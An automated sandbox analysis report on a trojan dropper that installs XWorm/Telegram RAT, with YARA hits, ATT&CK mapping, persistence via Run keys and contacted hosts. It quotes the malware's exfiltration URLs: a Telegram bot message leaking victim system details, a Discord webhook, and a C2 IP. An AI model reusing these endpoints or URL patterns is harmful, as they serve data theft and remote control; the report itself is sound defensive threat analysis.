Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe	Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: XClient.exe, 00000004.00000002.2705775289.000000001BD38000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000004.00000002.2712845531.000000001C760000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000004.00000002.2705775289.000000001BCF3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Roaming\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\XClient.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.XClient.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7992, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.XClient.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2695394174.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7992, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.XClient.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7992, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.XClient.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2695394174.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7992, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	111 Disable or Modify Tools	1 Credential API Hooking	1 File and Directory Discovery	Remote Services	12 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Service Execution	1 Windows Service	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Input Capture	125 System Information Discovery	Remote Desktop Protocol	1 Credential API Hooking	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	21 Registry Run Keys / Startup Folder	1 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	941 Security Software Discovery	SMB/Windows Admin Shares	1 Input Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	12 Process Injection	1 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	1 Clipboard Data	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Registry Run Keys / Startup Folder	2 Software Packing	LSA Secrets	351 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	14 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	351 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	58%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT
SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	100%	Avira	TR/Dropper.Gen
SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\XClient.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\XClient.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	25%	ReversingLabs
C:\Users\user\AppData\Roaming\XClient.exe	88%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://ip-api.com/line/?fields=hosting	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	true		unknown
api.telegram.org	149.154.167.220	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA31E5670B8AC1D800C46%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20MT6421D5%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4	true		unknown
185.84.160.88	true		unknown
http://ip-api.com/line/?fields=hosting	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.1600083870.00000292E0DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1739994356.00000224D3260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1912834311.000002D79006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2177220564.00000160A897B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000001B.00000002.2002206285.0000016098B39000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe, 00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp, XClient.exe, 00000004.00000002.2695394174.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://myexternalip.com/rawhttps://media.discordapp.net/attachments/986004472633360426/102441091717	MAXLEVLZ.exe, 00000002.00000002.1531526105.0000006B039FA000.00000004.00000010.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.1546142734.00000292D0F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1655442225.00000224C3419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1800705832.000002D78022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2002206285.0000016098B39000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000001B.00000002.2002206285.0000016098B39000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.microsoft.co	powershell.exe, 00000017.00000002.1947850955.000002D7EF6B0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 0000001B.00000002.2177220564.00000160A897B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.mic	powershell.exe, 00000005.00000002.1616353785.00000292E942E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 0000001B.00000002.2177220564.00000160A897B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discordapp.com/api/webhooks/1203640095937396768/Pl0ypjLLEfnaAvtcyJBNXsF_i3Hfi6Vh7raCnywH_hvJ	MAXLEVLZ.exe, 00000002.00000003.1523156504.0000025B01229000.00000004.00000020.00020000.00000000.sdmp, MAXLEVLZ.exe, 00000002.00000002.1531526105.0000006B039FA000.00000004.00000010.00020000.00000000.sdmp, MAXLEVLZ.exe, 00000002.00000002.1531917882.0000025B01229000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 0000001B.00000002.2002206285.0000016098B39000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V5.4%	XClient.exe, 00000004.00000002.2695394174.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://curl.haxx.se/docs/http-cookies.html	MAXLEVLZ.exe, 00000002.00000002.1532288272.00007FF624E1D000.00000002.00000001.01000000.00000006.sdmp	false		unknown
https://myexternalip.com/raw	MAXLEVLZ.exe, 00000002.00000002.1531826029.0000025B011C5000.00000004.00000020.00020000.00000000.sdmp, MAXLEVLZ.exe, 00000002.00000002.1531526105.0000006B039FA000.00000004.00000010.00020000.00000000.sdmp	false		unknown
http://crl.m	powershell.exe, 0000001B.00000002.2228163895.00000160B1150000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microso	powershell.exe, 00000015.00000002.1764008193.00000224DB9EE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.1546142734.00000292D0F88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1655442225.00000224C3419000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1800705832.000002D78022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2002206285.0000016098B39000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 0000001B.00000002.2177220564.00000160A897B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.1600083870.00000292E0DD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1739994356.00000224D3260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1912834311.000002D79006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2177220564.00000160A897B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://keyauth.win/api/1.2/Up	MAXLEVLZ.exe, 00000002.00000002.1531826029.0000025B011AB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.micft.cMicRosof	powershell.exe, 00000005.00000002.1616353785.00000292E942E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000005.00000002.1546142734.00000292D0D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1655442225.00000224C31F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1800705832.000002D780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2002206285.0000016098911000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	XClient.exe, 00000004.00000002.2695394174.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1546142734.00000292D0D61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1655442225.00000224C31F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1800705832.000002D780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2002206285.0000016098911000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://keyauth.win/api/1.2/	MAXLEVLZ.exe, 00000002.00000002.1531826029.0000025B011AB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://media.discordapp.net/attachments/986004472633360426/1024410917171105862/7D43EBF8-2791-4557-8	MAXLEVLZ.exe, 00000002.00000003.1523156504.0000025B01229000.00000004.00000020.00020000.00000000.sdmp, MAXLEVLZ.exe, 00000002.00000002.1531526105.0000006B039FA000.00000004.00000010.00020000.00000000.sdmp, MAXLEVLZ.exe, 00000002.00000002.1531917882.0000025B01229000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
185.84.160.88	unknown	Iran (ISLAMIC Republic Of)	23338	ASN-DCS-01US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532749
Start date and time:	2024-10-13 21:33:31 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@42/29@2/3
EGA Information:	Successful, ratio: 14.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 66 Number of non-executed functions: 2
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target MAXLEVLZ.exe, PID 7936 because there are no executed function
Execution Graph export aborted for target SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe, PID 7824 because it is empty
Execution Graph export aborted for target XClient.exe, PID 2068 because it is empty
Execution Graph export aborted for target XClient.exe, PID 5136 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7608 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8136 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Simulations

Behavior and APIs

Time	Type	Description
15:34:49	API Interceptor	60x Sleep call for process: powershell.exe modified
15:34:50	API Interceptor	1x Sleep call for process: MAXLEVLZ.exe modified
15:36:04	API Interceptor	42x Sleep call for process: XClient.exe modified
21:36:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
21:36:16	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Roaming\XClient.exe
21:36:24	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	SecuriteInfo.com.Python.Muldrop.18.50.31694.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json
	mIURiU8n2P.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	80BvHOM51j.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	sB2ClgrGng.exe	Get hash	malicious	Blank Grabber, XWorm	Browse	ip-api.com/json/?fields=225545
	s3OBQLA3xR.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	W1FREE.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	Tracking#1Z379W410424496200.vbs	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Orden de Compra 097890.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
149.154.167.220	mIURiU8n2P.exe	Get hash	malicious	XWorm	Browse
	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse
	sB2ClgrGng.exe	Get hash	malicious	Blank Grabber, XWorm	Browse
	1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	20062024150836 11.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.FileRepMalware.1304.4177.exe	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.FileRepMalware.1304.4177.exe	Get hash	malicious	Unknown	Browse
	d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	PO 2024-91113.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	SecuriteInfo.com.Python.Muldrop.18.50.31694.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	mIURiU8n2P.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	80BvHOM51j.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	sB2ClgrGng.exe	Get hash	malicious	Blank Grabber, XWorm	Browse	208.95.112.1
	s3OBQLA3xR.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	W1FREE.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Tracking#1Z379W410424496200.vbs	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Orden de Compra 097890.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
api.telegram.org	mIURiU8n2P.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse	149.154.167.220
	sB2ClgrGng.exe	Get hash	malicious	Blank Grabber, XWorm	Browse	149.154.167.220
	1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	20062024150836 11.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.FileRepMalware.1304.4177.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.FileRepMalware.1304.4177.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	PO 2024-91113.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	mIURiU8n2P.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	8svMXMXNRn.exe	Get hash	malicious	NoCry, XWorm	Browse	149.154.167.220
	sB2ClgrGng.exe	Get hash	malicious	Blank Grabber, XWorm	Browse	149.154.167.220
	1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	20062024150836 11.10.2024.vbe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
